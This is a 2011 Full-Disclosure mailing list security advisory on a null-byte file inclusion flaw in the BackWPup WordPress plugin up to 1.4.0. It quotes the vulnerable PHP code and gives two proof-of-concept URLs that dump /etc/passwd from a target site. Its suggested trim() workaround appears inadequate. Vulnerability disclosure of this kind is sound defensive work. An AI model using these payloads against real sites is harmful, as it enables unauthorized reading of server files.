'[Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content
From:       Danilo Massa <danilo_m () yahoo ! com>
Date:       2011-02-28 15:41:19
Message-ID: 913509.37937.qm () web114218 ! mail ! gq1 ! yahoo ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure

II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for Wordpress. 
The plugin provide:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
 
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and may be the previous ones too) has an unfiltered 
parameter inside 

two php pages that let a remote user to access sensitive files like /etc/passwd.
No authentication required. No plugin activation required.

IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the php pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.

Both files starts trying to include the wp-load.php file using the wpabs 
parameter that can
be inject with a direct call to the page.

options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile'])) 
{
 require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
options-runnow-iframe.php:
if (file_exists($_GET['wpabs'].'wp-load.php') and 
is_numeric(trim($_GET['jobid']))) {
 require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...

inserting a string terminator %00 inside the wpabs parameter is possible to 
specify a file
name instead of a directory and let it being included in the web page.
NOTE: also the 

V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on a Unix machine that hosts 
wordpress with the
vulnerable plugin.
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1



http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd


Both of them will display the /etc/passwd file.

VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file 
accessible by the wep application server user.

VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.

VIII. SOLUTION
-------------------------
Upgrade to a patched release or as quick workaround enclose 
any $_GET['wpabs'] in a trim call like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and 
file_exists($_GET['logfile'])) {

IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/

X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com

XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor release an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this  
information.



      


[Attachment #5 (text/html)]

<html><head><style type="text/css"><!-- DIV {margin:0px;} --></style></head><body><div \
style="font-family:times new roman, new york, times, \
serif;font-size:12pt"><DIV>=============================================<BR>- Release date: Feb \
28th, 2010<BR>- Discovered by: Danilo Massa<BR>- Severity: \
High<BR>=============================================</DIV> <DIV>&nbsp;</DIV>
<DIV>I. VULNERABILITY<BR>-------------------------<BR>BackWPup Wordpress plugin &lt;= 1.4.0 \
File content disclosure</DIV> <DIV>&nbsp;</DIV>
<DIV>II. BACKGROUND<BR>-------------------------<BR>BackWPup 1.4.0 is a full-featured backup \
management solution for Wordpress. <BR>The plugin provide:<BR>- Database Backup<BR>- WordPress \
XML Export<BR>- Optimize Database<BR>- Check\Repair Database<BR>- File Backup<BR>- Backups in \
zip,tar,tar.gz,tar.bz2 format<BR>- Store backup to Folder<BR>- Store backup to FTP Server<BR>- \
Store backup to Amazon S3<BR>- Store backup to RackSpaceCloud<BR>- Store backup to DropBox<BR>- \
Send Log/Backup by eMail<BR>&nbsp;</DIV> <DIV>III. \
INTRODUCTION<BR>-------------------------<BR>BackWPup version 1.4.0 (and may be the previous \
ones too) has an unfiltered parameter inside <BR>two php pages that let a remote user to access \
sensitive files like /etc/passwd.<BR>No authentication required. No plugin activation \
required.</DIV> <DIV>&nbsp;</DIV>
<DIV>IV. DESCRIPTION<BR>-------------------------</DIV>
<DIV>Input passed via the "wpabs" parameter to the php pages<BR>- \
wp-content/plugins/backwpup/app/options-view_log-iframe.php<BR>- \
wp-content/plugins/backwpup/app/options-runnow-iframe.php<BR>is not sanitized before being \
used.</DIV> <DIV><BR>Both files starts trying to include the wp-load.php file using the wpabs \
parameter that can<BR>be inject with a direct call to the page.</DIV> \
<DIV><BR>options-view_log-iframe.php:<BR>&lt;?PHP<BR>if \
(file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile'])) \
{<BR>&nbsp;require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment \
*/<BR>...</DIV> <DIV>options-runnow-iframe.php:<BR>if \
(file_exists($_GET['wpabs'].'wp-load.php') and is_numeric(trim($_GET['jobid']))) \
{<BR>&nbsp;require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment \
*/<BR>...</DIV> <DIV><BR>inserting a string terminator %00 inside the wpabs parameter is \
possible to specify a file<BR>name instead of a directory and let it being included in the web \
page.</DIV> <DIV>NOTE: also the </DIV>
<DIV><BR>V. PROOF OF CONCEPT<BR>-------------------------</DIV>
<DIV>Below is a harmless test that can be executed on a Unix machine that hosts wordpress with \
the<BR>vulnerable plugin.</DIV> <DIV><A \
href="http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/e \
tc/passwd%00&amp;jobid=1">http://&lt;wordpress_site&gt;/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&amp;jobid=1</A></DIV>
 <DIV><BR><A href="http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-ifra \
me.php?wpabs=/etc/passwd%00&amp;logfile=/etc/passwd">http://&lt;wordpress_site&gt;/wp-content/pl \
ugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&amp;logfile=/etc/passwd</A></DIV>
 <DIV>Both of them will display the /etc/passwd file.</DIV>
<DIV><BR>VI. BUSINESS IMPACT<BR>-------------------------<BR>An attacker could exploit the \
vulnerability to retrieve virtually any text file <BR>accessible by the wep application server \
user.</DIV> <DIV>&nbsp;</DIV>
<DIV>VII. SYSTEMS AFFECTED<BR>-------------------------<BR>Version 1.4.0 is \
vulnerable.<BR>Versions &lt;1.4.0 could be vulnerable.</DIV> <DIV>&nbsp;</DIV>
<DIV>VIII. SOLUTION<BR>-------------------------<BR>Upgrade to a patched release or as quick \
workaround enclose <BR>any $_GET['wpabs'] in a trim call like this:</DIV> <DIV>if \
(file_exists(trim($_GET['wpabs']).'wp-load.php') and file_exists($_GET['logfile'])) {</DIV> \
<DIV><BR>IX. REFERENCES<BR>-------------------------<BR><A \
href="http://wordpress.org/extend/plugins/backwpup/">http://wordpress.org/extend/plugins/backwpup/</A><BR><A \
href="http://danielhuesken.de/portfolio/backwpup/">http://danielhuesken.de/portfolio/backwpup/</A></DIV>
 <DIV>&nbsp;</DIV>
<DIV>X. CREDITS<BR>-------------------------<BR>The vulnerability has been discovered by Danilo \
Massa<BR>danilo(under_score)m(at)yahoo(dot)com</DIV> <DIV>&nbsp;</DIV>
<DIV>XI. VULNERABILITY HISTORY<BR>-------------------------<BR>January 28th, 2011: \
Vulnerability identification<BR>January 30th, 2011: Vendor notification<BR>January 30th, 2011: \
Vendor release an updated version (1.4.1)<BR>February 28th, 2011: Vulnerability \
disclosure</DIV> <DIV>XII. LEGAL NOTICES<BR>-------------------------<BR>The information \
contained within this advisory is supplied "as-is" with<BR>no warranties or guarantees of \
fitness of use or otherwise. I accept no<BR>responsibility for any damage caused by the use or \
misuse of this&nbsp; <BR>information.<BR></DIV></div><br>



      </body></html>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic